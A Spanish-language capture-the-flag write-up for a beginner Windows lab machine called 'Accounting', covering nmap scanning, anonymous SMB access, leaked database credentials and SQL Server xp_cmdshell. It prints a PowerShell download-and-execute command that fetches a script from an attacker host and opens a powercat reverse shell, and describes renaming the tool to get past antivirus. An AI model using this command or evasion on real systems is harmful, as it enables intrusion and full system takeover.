❌Nombre: Accounting
📈Nivel: Principiante
💻OS: WINDOWS

Enumeración

Escaneo de puertos

Realizamos un escaneo de todos los puertos para saber cuáles están activos.

Los parámetros utilizados son:

• -p- : Escaneo de todos los puertos. (65535)
• -sS : Realiza un TCP SYN Scan para escanear de manera rápida que puertos están abiertos.
• -sC : Realiza una escaneo con los scripts básicos de reconocimiento
• -sV : Realiza un escaneo en buque da de los servicios
• –min-rate 5000: Especificamos que el escaneo de puertos no vaya más lento que 5000 paquetes por segundo, el parámetro anterior y este hacen que el escaneo se demore menos.
• -n: No realiza resolución de DNS, evitamos que el escaneo dure más tiempo del necesario.
• -Pn: Deshabilitamos el descubrimiento de host mediante ping.

Nos conectaremos por smb para ver recursos compartidos sin credenciales

Accedemos a la carpeta Compac y extraemos un archivo .txt.

Nos da unas credenciales parece ser de la base de datos.

Con crackmapexec vamos a obtener el nombre del equipo.

Y nos conectamos a la base de datos, ademas ejecutaremos «enable_xp_cmdshell» para obtener una shell.

xp_cmdshell powershell "iex(new-object net.webclient).downloadstring(\"http://192.168.18.19/mitren.ps1\");powerrcatt -c 192.168.18.19 -p 9001 -e cmd"

Nos descargaremos porwecat y le cambiaremos el nombre con el fin de «bypassear» el AV, ejecutamos el comando para descargar y ejecutar el archivo, no sin antes ponernos en escucha y abriendo un servidor en Python.

Vemos que somos el usuario nt authority\system, el usuario con mas privilegios del sistema.